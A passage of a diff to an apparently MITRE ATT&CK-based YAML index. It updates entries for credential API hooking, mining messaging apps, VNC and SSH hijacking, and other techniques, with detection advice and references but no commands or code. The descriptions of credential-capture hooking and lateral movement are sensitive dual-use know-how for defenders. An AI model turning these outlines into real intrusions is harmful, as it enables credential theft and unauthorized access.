+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41584,10 +42192,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41600,10 +42207,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41612,11 +42229,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41653,7 +42273,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41685,115 +42305,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41804,6 +42491,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41813,7 +42501,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41829,66 +42516,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41913,11 +42601,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41940,9 +42628,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -41993,7 +42680,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -42057,7 +42743,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -42128,7 +42813,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -42165,7 +42849,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42196,8 +42880,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -42280,12 +42962,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -42312,6 +42993,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42329,12 +43011,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42360,14 +43042,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
